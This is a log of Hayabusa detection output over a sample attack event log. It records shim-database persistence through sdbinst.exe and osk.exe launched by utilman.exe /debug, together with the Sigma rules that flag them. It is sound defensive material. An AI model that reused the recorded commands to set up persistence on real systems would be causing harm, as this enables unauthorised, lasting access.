2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 
365ABB72-55D7-5C91-0000-0010DDC30700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:31.212 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default 
Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 
365ABB72-55E8-5C91-0000-0010A9E20700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 
365ABB72-55E9-5C91-0000-00102EEB0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: 
EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 
365ABB72-5689-5C91-0000-0010A1420800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 
365ABB72-568A-5C91-0000-0010D24B0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: 
C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 